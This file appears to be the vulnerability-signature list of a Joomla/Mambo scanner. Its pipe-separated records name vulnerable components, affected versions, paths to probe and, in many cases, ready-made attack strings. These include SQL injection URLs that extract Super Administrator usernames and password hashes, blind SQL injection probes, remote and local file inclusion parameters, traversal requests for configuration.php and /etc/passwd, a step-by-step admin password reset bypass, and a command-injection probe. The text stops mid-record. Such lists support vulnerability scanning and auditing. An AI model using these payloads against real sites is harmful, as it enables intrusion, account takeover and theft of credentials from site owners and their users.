BibTeX Versions affected: 1.3 and older|/components/com_jombib/|N/A
RSfiles Versions affected: 1.0.2 and older|/components/com_rsfiles/|N/A
J! Reactions Versions affected: 1.8.1 and older|/components/com_jreactions/|N/A
mosListMessenger Versions affected: 2.1.0 and older|/components/com_lm/|N/A
Webring File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_webring/|/components/com_webring/admin.webring.docs.php?component_dir=
Joomla! 12Pictures File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_joom12pic/|/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
FlashFun Versions affected: 1.0 and older|/components/com_flashfun/|N/A
NeoRecruit SQL Injection Vulnerability Versions affected: 1.4.0 and older|/components/com_neorecruit/|/index.php?option=com_neorecruit&task=offer_view&id=option=com_neorecruit&task=offer_view&id=99999999999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,111,222,333,444,0,0,0,555,666,777,888,1,2,3,4,5,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
MosReporter File Inclusion Vulnerability Versions affected: 0.9.3 and older|/components/com_reporter/processor/reporter.sql.php|/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=
Joomla Flash Fun! File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_joomlaflashfun/|/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=
mosDirectory SQL Injection Vulnerability Versions affected: 2.3.2 and older|/components/com_directory/|/index.php?option=com_directory&page=viewcat&catid=-1+UNION+SELECT+0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
PU Arcade SQL Injection Vulnerability Versions affected: 2.1.3 Beta and older|/components/com_puarcade/|/index.php?option=com_puarcade&Itemid=92&fid=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
RSGallery SQL Injection Vulnerability Versions affected: 2.0 beta 5 and older|/components/com_rsgallery/|/index.php?option=com_rsgallery&page=inline&catid=-1+UNION+SELECT+1,2,3,4,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),6,7,8,9,10,11+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
JUser File Inclusion Vulnerability Versions affected: 1.0.14 and older|/components/com_juser/|/components/com_juser/xajax_functions.php?mosConfig_absolute_path=
Carousel Flash Image Gallery File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_jjgallery/|/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=
Color Lab File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_colorlab/|/components/com_color/admin.color.php?mosConfig_live_site=
Joomla Flash Uploader File Inclusion Vulnerability Versions affected: 2.5.2 and older|/components/com_joomla_flash_uploader/|/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=
JContentSubscription File Inclusion Vulnerability Versions affected: 1.5.8 and older|/components/com_jcs/|/components/com_jcs/jcs.function.php?mosConfig_absolute_path=
Mp3 Allopass File Inclusion Vulnerability Versions affected: 1.0 and older|/components/com_mp3_allopass/|/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=
Joomla Remote Admin Password Change Versions affected: 1.5.5 <=|/components/com_user/controller.php|1. Go to URL: target.com/index.php?option=com_user&view=reset&layout=confirm 2. Write the character ' into the "token" field and click OK. 3. Write a new password for admin. 4. Go to URL: target.com/administrator/ 5. Log in as admin with the new password.
Joomla Component (xsstream-dm) Remote SQL Injection|/components/com_xsstream-dm/|/index.php?option=com_xsstream-dm&Itemid=69&movie=-1/**/union/**/select/**/1,2,admin,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
Joomla Component (biblestudy) Remote SQL Injection|/components/com_biblestudy/|/index.php?option=com_biblestudy&view=mediaplayer&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,13,14,15,16,17,18,19,20,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
com_eventlist SQL Injection Vulnerability Versions affected: N/A|/components/com_eventlist/|/index.php?option=com_eventlist&func=details&did=9999999999999+UNION+SELECT+0,0,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,00,0,444,555,0,777,0,999,0,0,0,0,0,0,0+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
jabode - Remote SQL Injection Version affected: N/A|/components/com_jabode/|/index.php?option=com_jabode&task=sign&sign=taurus&id=-2+UNION+SELECT+1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
netinvoice Remote SQL Injection Version affected: N/A|/components/com_netinvoice/|/index.php?option=com_netinvoice&action=orders&task=order&cid=-1 UNION SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--
beamospetition Remote SQL Injection Version affected:
N/A|/components/com_beamospetition/|/index.php?option=com_beamospetition&pet=-5+UNION+SELECT+1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- prayercenter Remote SQL injection Version Affected: N/A|/components/com_prayercenter/|/index2.php?option=com_prayercenter&task=view_request&id=-1+UNION+SELECT+1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_webhosting Blind SQL Injection Version Affected: N/A|/components/com_webhosting/|/index.php?option=com_webhosting&catid=1+and+substring(@@version,1,1)=5::/index.php?option=com_webhosting&catid=1+and+substring(@@version,1,1)=6 com_datsogallery Blind SQL Injection Exploit Version Affected: 1.6 or lower|/components/com_datsogallery/|Fill useragent string with 15754'),(1,if(ascii(substring((select password from #__users where username='admin'),0,1))>58,(select 'Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14'),(select link from #__menu)))/* com_artist Remote SQL injection Version Affected: N/A|/components/com_artist/|/index.php?option=com_artist&idgalery=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_mycontent Blind SQL Injection Version Affected: N/A|/components/com_mycontent/|/index.php?option=com_mycontent&task=view&id=10+and+substring(@@version,1,1)=5::/index.php?option=com_mycontent&task=view&id=10+and+substring(@@version,1,1)=6 Joo!BB Blind SQL Injection Exploit Version Affected: 0.5.9 or lower|/components/com_joobb/|/index.php?option=com_joobb&view=forum&forum=1+and+substring(@@version,1,1)=5::/index.php?option=com_joobb&view=forum&forum=1+and+substring(@@version,1,1)=6 Joomla Component acctexp Blind SQL Injection Vulnerability Version 
Affected: <= 0.12|/components/com_acctexp/|/index.php?option=com_acctexp&task=subscribe&usage=+and+substring(@@version,1,1)=5::/index.php?option=com_acctexp&task=subscribe&usage=+and+substring(@@version,1,1)=6 joomradio Remote SQL Injection Version Affected: <= 1.0 |/components/com_joomradio/|/index.php?option=com_joomradio&page=show_video&id=-1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_equotes Remote SQL injection Version Affected: 0.95 <=|/components/com_equotes/|/index.php?option=com_equotes&id=13+and+1=1+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_idoblog Remote SQL Injection Version Affected: b24 <=|/components/com_idoblog/|/index.php?option=com_idoblog&task=userblog&userid=42+and+1=1+UNION+SELECT+1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component JooBlog Blind SQL Injection Exploit Version Affected: 0.1.1 <=|/components/com_jb2/|/index.php?option=com_jb2&view=category&CategoryID=1+and+substring(@@version,1,1)=5::/index.php?option=com_jb2&view=category&CategoryID=1+and+substring(@@version,1,1)=6 Component jotloader Blind SQL Injection Exploit Version Affected: 1.2.1.a <=|/components/com_jotloader/|/index.php?option=com_jotloader&cid=1+and+substring(@@version,1,1)=5::/index.php?option=com_jotloader&cid=1+and+substring(@@version,1,1)=6 EasyBook SQL Injection Exploit Version Affected: 1.1 <=|/components/com_easybook/|/index.php?option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- joomladate Remote SQL injection Version 
Affected: N/A|/components/com_joomladate/ |/index.php?option=com_joomladate&task=viewProfile&user=9999999+UNION+SELECT+1,1,1,1,1,1,1,1,1,1,1,1,1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),1,1,1,1,1,1,1+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component GameQ Remote SQL injection Version Affected: 4.0 <=|/components/com_game/|/index.php?option=com_gameq&task=page&category_id=-1+UNION+SELECT+1,2,3,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),5,6,7,8,9,10,11,12,13,14+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- n-forms Blind SQL Injection Exploit Version Affected: 1.01 <=|/components/com_n-forms/|/index.php?option=com_n-forms&form_id=1+and+substring(@@version,1,1)=5::/index.php?option=com_n-forms&form_id=1+and+substring(@@version,1,1)=6 yvcomment Blind SQL Injection Exploit Version Affected: 1.16 <=|/components/com_yvcomment/|/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+substring(@@version,1,1)=5::/index.php?option=com_yvcomment&view=comment&ArticleID=1+and+substring(@@version,1,1)=6 News Portal Blind SQL Injection Exploit Version Affected: 1.0 <=|/components/com_news_portal/|/index.php?option=com_news_portal&Itemid=1+and+substring(@@version,1,1)=5::/index.php?option=com_news_portal&Itemid=1+and+substring(@@version,1,1)=6 expshop Remote SQL injection Version Affected: N/A|/components/com_expshop/|/index.php?option=com_expshop&page=show_payment&catid=-2+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Xe webtv Blind SQL Injection Exploit Version Affected: N/A|/components/com_xewebtv/|/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+substring(@@version,1,1)=5::/index.php?option=com_xewebtv&Itemid=60&func=detail&id=1+and+substring(@@version,1,1)=6 com_versioning (id) Remote Sql Injection Vulnerability Version Affected: 1.0.2 <=|/components/com_versioning 
/|/index.php?option=com_versioning&task=edit&id=-83+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 FROM jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- mygallery Remote SQL Injection Exploit Version Affected: N/A|/components/com_mygallery/|/index.php?option=com_mygallery&func=viewcategory&cid=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component Brightcode Weblinks Remote SQL injection Version Affected: N/A|/component/com__brightweblinks/|/index.php?option=com_brightweblinks&Itemid=58&catid=1 UNION SELECT 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16 FROM jos_users WHERE usertype=0x53757065722041646d696e6973747261746f72-- Component QuickTime VR Remote SQL Injection Version Affected: 1.0 <=|/components/com_vr/|/index.php?option=com_vr&Itemid=78&task=viewer&room_id=-1+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),2+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- is_com Multiple Remote SQL Injection Version Affected: 1.0.1 <=|/components/com_is/|/index.php?option=com_is&task=motor&motor=-1+UNION+SELECT+1,2,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),4,5,6,7,8,9,10,11,12,13+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- altas multiple SQL Injection Version Affected: 1.0 <=|/components/com_altas/|/index.php?option=com_altas&mes=-1%20union%20select%201,2,password,4,5,6,7,8/**/from/**/jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_dbquery Remote file Inclusion Version Affected: 1.4.1.1 <=|/components/com_dbquery/|/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path= com_content SQL Injection Vulnerability Version Affected: 1.0.0 
<=|/components/com_content/|/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999+UNION+SELECT+1,concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e),3,4,5+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- ionFiles com_ionfiles Arbitrary File Download Vulnerability Version Affected: 4.4.2 <= |/components/com_ionfiles/|/components/com_ionfiles/download.php?file=../../configuration.php&download=1 Component DT Remote SQL Injection Exploit Version Affected: N/A|/components/com_dtregister/|/index.php?option=com_dtregister&eventId=-12+UNION+SELECT+concat(0x1e,username,0x3a,password,0x1e,0x3a,usertype,0x1e)+FROM+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72&task=pay_options&Itemid=138 com_ezstore Blind SQL Injection Exploit Version Affected: N/A|/components/com_ezstore/|/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+substring(@@version,1,1)=5::/index.php?option=com_ezstore&Itemid=1&func=detail&id=1+and+substring(@@version,1,1)=6 Joomla Imagebrowser Directory Tranversal Vulnerability Version Affected: 0.1.5 RC2 <=|/components/remository/|/index.php?option=com_imagebrowser&folder=../../../../_non_ com_hotspots Remote SQL Injection Exploit Version Affected: N/A|/components/com_hotspots/|/index.php?Itemid=53&option=com_hotspots&task=w&w=5+and+1=2+union+select+concat(username,0x3a,password)+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_joomtracker Remote SQL Injection Exploit Version Affected: 1.0.1 <=|/components/com_joomtracker/|/index.php?option=com_joomtracker&task=tordetails&id=1/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/**/from/**/jos_users/* +where+usertype=0x53757065722041646d696e6973747261746f72 Component Ignite Remote SQL Injection Exploit Version Affected: 0.8.3 
<=|/components/com_ignitegallery/|/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--&Itemid=18 Component Mad4Joomla Mailforms Remote SQL Injection Exploit Version Affected: N/A|/components/com_mad4joomla/|/index.php?option=com_mad4joomla&jid=-2+union+select+1,concat(username,char(58),password)KHG,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component Ownbiblio (com_ownbiblio) Remote SQL Injection Exploit Version Affected: 1.5.3 <=|/components/com_ownbiblio/|/index.php?option=com_ownbiblio&view=catalogue&catid=-1+union+all+select+1,2,concat(username,char(58),password)KHG,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Daily Message (com_dailymessage) Remote SQL Injection Exploit Version Affected: 1.0.3 <=|/components/com_dailymessage/|/index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_ds-syndicate Remote SQL Injection Exploit Version Affected: N/A|/components/com_ds-syndicate/|/index.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- com_thyme Remote SQL Injection Exploit Version Affected: 1.0 <=|/components/com_thyme/|/index.php?option=com_thyme&calendar=1&category=1&d=1&m=1&y=2008&Itemid=1&event=1'+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat(username,0x3a,password),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Component Archaic Binary Gallery Directory Traversal Vulnerability Version Affected: 1.0 
<=|/components/com_ab_gallery/|/index.php?option=com_ab_gallery&Itemid=37&gallery=/../../ Component Kbase (com_kbase) Remote SQL Injection Exploit Version Affected: 1.2 <=|/components/com_kbase/|/index.php?option=com_kbase&view=article&id=-1+union+select+1,concat(username,char(58),password)KHG,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Flash Tree Gallery(com_treeg) Remote File Inclusion Vulnerability Version Affected: 1.0 <=|/components/com_treeg/|/components/com_treeg/admin.treeg.php?mosConfig_live_site= VirtueMart Google Base Component (com_googlebase) Remote File Inclusion Vulnerability Version Affected: 1.1 <=|/components/com_googlebase/|/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path= com_ongumatimesheet20 Beta Remote File Inclusion Vulnerability Version Affected: 4 <=|/components/com_ongumatimesheet20/|/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path= Joomla Component ProDesk (com_pro_desk) Local File Inclusion Vulnerability Version Affected: 1.2 <=|/components/com_pro_desk/|/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd Clickheat - Heatmap stats for Joomla! 
Multiple Remote File Inclusion Vulnerabilities Version Affected: 1.0.1 <=|/components/com_clickheat/|/components/com_clickheat/Recly/common/GlobalVariables.php?GLOBALS[mosConfig_absolute_path]= People Book File Inclusion Vulnerability Versions effected: 1.1.5 and older|/admin/components/com_peoplebook/param.peoplebook.php|/admin/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= Mambo eMail Publisher File Inclusion Vulnerability Versions effected: 1.2 and older|/admin/components/com_mmp/help.mmp.php|/admin/components/com_mmp/help.mmp.php?mosConfig_absolute_path= Dada Mail Manager Component Remote File Inclusion Vulnerability Version Affected: 2.6 <=|/components/com_dadamail/|/components/com_dadamail/config.dadamail.php?GLOBALS[mosConfig_absolute_path]= Recly!Competitions Component Multiple Remote File Inclusion Vulnerability Version Affected: 1.0.0 <=|/components/com_competitions/|/components/com_competitions/includes/settings/settings.php?mosConfig_absolute_path= People Book File Inclusion Vulnerability Versions effected: 1.1.5 and older|/administrator/components/com_peoplebook/param.peoplebook.php|/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path= Feederator - RSS manager Component Multiple Remote File Inclusion Vulnerabilities Version Affected: 1.0.5 <=|/components/com_recly/|/components/com_feederator/includes/tmsp/add_tmsp.php?mosConfig_absolute_path=[evilcode] /components/com_feederator/includes/tmsp/edit_tmsp.php?mosConfig_absolute_path=[evilcode] /components/com_feederator/includes/tmsp/subscription.php?GLOBALS[mosConfig_absolute_path]=[evilcode] /components/com_feederator/includes/tmsp/tmsp.php?mosConfig_absolute_path= Joomla com_books(book_id) Remote SQL Injection Exploit Version Affected: 
<=|/components/com_books/|/index.php?option=com_books&task=book_details&book_id=-9999+UNION+SELECT+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Joomla & Mambo com_catalogproduction (id) Remote SQL Injection Exploit Version Affected: N/A |/components/com_catalogproduction/|/index.php?option=com_catalogproduction&task=viewdetail&id=-9999+union+all+select+1,2,concat(username,char(58),password),null,null,6,7,8,9,0,11,12,13,14,15,16,17,null,19,20+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- Simple RSS Reader Component Remote File Inclusion Vulnerability Version Affected: 1.0 <=|/components/com_rssreader/|/components/com_rssreader/admin.rssreader.php?mosConfig_live_site= Hot Property Version Affected: 0.97 <=|/components/com_hotproperties/|N/A com_search Remote Code Execution Exploit Version Affected: 1.5 beta 2 <=|/components/com_search/|/index.php?option=com_search&Itemid=1&searchword=%22%3Becho%20md5(911)%3B%23 com_contactinfo(catid) Remote SQL Injection Exploit Version Affected: N/A|/components/com_contactinfo/|/index.php?option=com_contactinfo&catid=-9999/**/UNION/**/SELECT/**/1,2,concat(username,char(58),password),4,5,6,7,8,9,0,11,12,13,14,15,16+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72--/* A6MamboCredits File Inclusion Vulnerability Versions effected: Any|/administrator/components/com_a6mambocredits/|/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= A6MamboCredits File Inclusion Vulnerability Versions effected: Any|/admin/components/com_a6mambocredits/|/admin/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0 
<=|/admin/components/com_comprofiler/plugin.class.php|/admin/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= A6MamboHelpDesk File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_a6mambohelpdesk/|/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site= A6MamboHelpDesk File Inclusion Vulnerability Versions effected: Any Version|/admin/components/com_a6mambohelpdesk/|/admin/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_absolute_path= Colophon File Inclusion Vulnerability Versions effected: 1.2 and older|/administrator/components/com_colophon/|/administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= Colophon File Inclusion Vulnerability Versions effected: 1.2 and older|/admin/components/com_colophon/|/admin/components/com_colophon/admin.colophon.php?mosConfig_absolute_path= Community Builder Component File Inclusion Vulnerability Versions Affected: 1.0 <=|/administrator/components/com_comprofiler/plugin.class.php|/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= MambelFish File Inclusion Vulnerability Versions effected: 1.x and older|/administrator/components/com_mambelfish/|/administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path= MambelFish File Inclusion Vulnerability Versions effected: 1.x and older|/admin/components/com_mambelfish/|/admin/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path= Com Profiler Blind SQL Injection Versions effected: 1.0 RC2 and older|/administrator/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=5::/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=6 Com Profiler Blind SQL Injection Versions effected: 1.0 RC2 and 
older|/admin/components/com_comprofiler/|/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=5::/index.php?option=com_comprofiler&task=userProfile&user=1+and+substring(@@version,1,1)=6 User Home Pages 2 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/administrator/components/com_uhp2/|/administrator/components/com_uhp2/uhp_config.php?mosConfig_absolute_path= User Home Pages 2 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/admin/administrator/components/com_uhp2/|/admin/components/com_uhp2/uhp_config.php?mosConfig_absolute_path= User Home Pages 1 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/administrator/components/com_uhp/|/administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path= User Home Pages 1 File Inclusion Vulnerability Versions effected: 1.1.1 and older|/admin/components/com_uhp/|/admin/components/com_uhp/uhp_config.php?mosConfig_absolute_path= Bayesian Naive Filter File Inclusion Vulnerability Versions effected: 1.1 and older|/administrator/components/com_bayesiannaivefilter/|/administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= Bayesian Naive Filter File Inclusion Vulnerability Versions effected: 1.1 and older|/admin/components/com_bayesiannaivefilter/|/admin/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path= Webring File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_webring/|/administrator/components/com_webring/admin.webring.docs.php?component_dir= Webring File Inclusion Vulnerability Versions effected: 1.0 and older|/admin/components/com_webring/|/admin/components/com_webring/admin.webring.docs.php?component_dir= JIM File Inclusion Vulnerability Versions effected: 1.0.1 and older|/administrator/components/com_jim/|/administrator/components/com_jim/install.jim.php?mosConfig_absolute_path= JIM File Inclusion Vulnerability Versions effected: 1.0.1 and 
older|/admin/components/com_jim/|/admin/components/com_jim/install.jim.php?mosConfig_absolute_path= Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_mgm/|/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path= Mambo Gallery Manager(com_mgm) File Inclusion Vulnerability Versions effected: Any Version|/admin/components/com_mgm/|/admin/components/com_mgm/help.mgm.php?mosConfig_absolute_path= Link Directory File Inclusion Vulnerability Versions effected: Any Version|/administrator/components/com_linkdirectory/|/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= Link Directory File Inclusion Vulnerability Versions effected: Any Version|/admin/components/com_linkdirectory/|/admin/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path= Kochsuite File Inclusion Vulnerability Versions effected: 0.9.4 and older|/administrator/components/com_kochsuite /|/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= Kochsuite File Inclusion Vulnerability Versions effected: 0.9.4 and older|/admin/components/com_kochsuite /|/admin/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path= SWmenu File Inclusion Vulnerability Versions effected: 4.0 and older|/administrator/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= SWmenu File Inclusion Vulnerability Versions effected: 4.0 and older|/admin/components/com_swmenupro/|/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path= JoomlaPack File Inclusion Vulnerability Versions effected: 1.0.4a2 RE and older|/administrator/components/com_jpack/|/administrator/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path= JoomlaPack File Inclusion Vulnerability Versions effected: 1.0.4a2 RE and 
older|/admin/components/com_jpack/|/admin/components/com_jpack/includes/CAltInstaller.php?mosConfig_absolute_path= PCL Library File Inclusion Vulnerability Versions Affected: N/A|/libraries/pcl/|/libraries/pcl/pcltar.php?g_pcltar_lib_dir= Joomla Radio 5 File Inclusion Vulnerability Versions effected: 5.0 and older|/administrator/components/com_joomlaradiov5/|/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= Joomla Radio 5 File Inclusion Vulnerability Versions effected: 5.0 and older|/admin/components/com_joomlaradiov5/|/admin/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site= Joomla Flash Fun! File Inclusion Vulnerability Versions effected: 1.0 and older|/administrator/components/com_joomlaflashfun/|/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= Joomla Flash Fun! Versions effected: 1.0 and older|/admin/components/com_joomlaflashfun/|/admin/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site= Module mod_pxt File Inclusion Vulnerability Versions Affected: N/A |/modules/mod_pxt/|/modules/mod_pxt/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]= JContentSubscription File Inclusion Vulnerability Versions effected: 1.5.8 and older|/administrator/components/com_jcs/|/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path= JContentSubscription File Inclusion Vulnerability Versions effected: 1.5.8 and older|/admin/components/com_jcs/|/admin/components/com_jcs/views/list.sub.html.php?mosConfig_absolute_path= Joomla Flash Uploader File Inclusion Vulnerability Versions effected: 2.5.2 and older|/administrator/components/com_joomla_flash_uploader/|/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path= MosMedia File Inclusion Vulnerability Versions effected: 1.0.8 and 
